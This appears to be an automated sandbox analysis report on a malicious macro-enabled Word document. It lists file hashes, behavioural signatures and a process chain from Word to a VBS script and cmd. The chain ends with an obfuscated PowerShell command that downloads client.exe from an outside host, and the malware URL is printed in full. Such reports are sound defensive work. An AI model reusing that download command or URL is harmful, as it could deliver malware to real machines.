Analysis
-
max time kernel
71s -
max time network
137s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
21-05-2022 03:39
Static task
static1
Behavioral task
behavioral1
Sample
2020_1844777494.docm
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
2020_1844777494.docm
Resource
win10v2004-20220414-en
General
-
Target
2020_1844777494.docm
-
Size
380KB
-
MD5
bbea719b296b81cb70e294246c9d6eae
-
SHA1
d79c7c9a0ddc7d3c7d90eb90f47783e999bb7ebd
-
SHA256
99d22eb3d584f502292d847497713c8db10f7aa9d2b08f5f6da8e690be4f7832
-
SHA512
40d7d306bfc8fad85f82d7f3fe9b5baec403a953178bf8284043afcb136b2356084151ded8f1e5c75aaa480e30a2aad0235adea09fdf4fffb7341d5890c67d17
Malware Config
Extracted
http://werfpop.nl/client.exe
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
explorer.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 3700 3196 explorer.exe WINWORD.EXE -
Blocklisted process makes network request 3 IoCs
Processes:
powershell.exeflow pid process 31 4204 powershell.exe 32 4204 powershell.exe 34 4204 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 1112 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 760 taskkill.exe -
Modifies registry class 1 IoCs
Processes:
explorer.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\Local Settings explorer.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 3196 WINWORD.EXE 3196 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 4204 powershell.exe 4204 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
taskkill.exepowershell.exedescription pid process Token: SeDebugPrivilege 760 taskkill.exe Token: SeDebugPrivilege 4204 powershell.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
WINWORD.EXEpid process 3196 WINWORD.EXE 3196 WINWORD.EXE 3196 WINWORD.EXE 3196 WINWORD.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
WINWORD.EXEexplorer.exeWScript.execmd.exedescription pid process target process PID 3196 wrote to memory of 3700 3196 WINWORD.EXE explorer.exe PID 3196 wrote to memory of 3700 3196 WINWORD.EXE explorer.exe PID 3632 wrote to memory of 540 3632 explorer.exe WScript.exe PID 3632 wrote to memory of 540 3632 explorer.exe WScript.exe PID 540 wrote to memory of 1960 540 WScript.exe cmd.exe PID 540 wrote to memory of 1960 540 WScript.exe cmd.exe PID 1960 wrote to memory of 760 1960 cmd.exe taskkill.exe PID 1960 wrote to memory of 760 1960 cmd.exe taskkill.exe PID 1960 wrote to memory of 4204 1960 cmd.exe powershell.exe PID 1960 wrote to memory of 4204 1960 cmd.exe powershell.exe PID 1960 wrote to memory of 1112 1960 cmd.exe timeout.exe PID 1960 wrote to memory of 1112 1960 cmd.exe timeout.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\2020_1844777494.docm" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\explorer.exeexplorer.exe C:\ProgramData\Portes.vbs2⤵
- Process spawned unexpected child process
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Portes.vbs"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Game_Lods\Groters.cmd" "3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exeTaskkill /IM "winword.exe" /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePOWerShell ("Ne"w-Object Net.WebClient")"."Dow"nloadFile"('"http://werfpop.nl/client.exe', 'C:\Game_Lods\Kritos.exe')4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\timeout.exeTIMEOUT /T 104⤵
- Delays execution with timeout.exe
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Game_Lods\Groters.cmdFilesize
4KB
MD50113834f9f390e12db3057891516f47d
SHA19c7e3a611586726c18f33ca668ce8c8e8ffc2919
SHA2566231b5b04cb2708b8b8446536de8df99391da90bc77449589ab0e5b7660738e6
SHA5120cd634772edb38f33222bc8654257f0959a063fcf5f8cea59d10a4b106746855dfcb974420e3729088e082d71f57e712a17b599ca69b06a0674b531358769fef
-
C:\ProgramData\Nolewr.vbsFilesize
358B
MD5c16098d503816c750a2b4ce0b179798f
SHA1e0a6368150f802e5ece6558b2693fa4ca8eeb4b8
SHA2568ba6c20c21eb3a74998f53f1f7d8aa1a139a98c7413ce7bcb3052280f75b3f7d
SHA512e3ca2ce1cc04b37b861489dd1fd21575efe261b436bb29eeed8653f0b5558ac902c8c0f7596bbae91b28854946597da5b385d0614edbf1e8755b955bed698929
-
C:\ProgramData\Portes.vbsFilesize
68KB
MD5633d05bd06f41c9aa4281baa46ce38e4
SHA1056a5a05108edbedde196098e07553c5c201368f
SHA256a478b1ba294dee526fdf1986402d5e387151394525cc5f523026183197672a77
SHA512268f61d20235696295481651ce70c20164ce4a16f6b6ae4b3e14d86f9e2743904db19e05810991f5928e3e82b08a11a9355a18d711309e1eef118047467a3c7a
-
memory/540-141-0x0000000000000000-mapping.dmp
-
memory/760-148-0x0000000000000000-mapping.dmp
-
memory/1112-152-0x0000000000000000-mapping.dmp
-
memory/1960-146-0x0000000000000000-mapping.dmp
-
memory/3196-130-0x00007FFA89350000-0x00007FFA89360000-memory.dmpFilesize
64KB
-
memory/3196-145-0x00007FFA89350000-0x00007FFA89360000-memory.dmpFilesize
64KB
-
memory/3196-136-0x00007FFA871C0000-0x00007FFA871D0000-memory.dmpFilesize
64KB
-
memory/3196-135-0x00007FFA871C0000-0x00007FFA871D0000-memory.dmpFilesize
64KB
-
memory/3196-137-0x00000292BD920000-0x00000292BD924000-memory.dmpFilesize
16KB
-
memory/3196-143-0x00007FFA89350000-0x00007FFA89360000-memory.dmpFilesize
64KB
-
memory/3196-131-0x00007FFA89350000-0x00007FFA89360000-memory.dmpFilesize
64KB
-
memory/3196-144-0x00007FFA89350000-0x00007FFA89360000-memory.dmpFilesize
64KB
-
memory/3196-142-0x00007FFA89350000-0x00007FFA89360000-memory.dmpFilesize
64KB
-
memory/3196-134-0x00007FFA89350000-0x00007FFA89360000-memory.dmpFilesize
64KB
-
memory/3196-133-0x00007FFA89350000-0x00007FFA89360000-memory.dmpFilesize
64KB
-
memory/3196-132-0x00007FFA89350000-0x00007FFA89360000-memory.dmpFilesize
64KB
-
memory/3700-138-0x0000000000000000-mapping.dmp
-
memory/4204-150-0x00000220F3970000-0x00000220F3992000-memory.dmpFilesize
136KB
-
memory/4204-151-0x00007FFAAA920000-0x00007FFAAB3E1000-memory.dmpFilesize
10.8MB
-
memory/4204-149-0x0000000000000000-mapping.dmp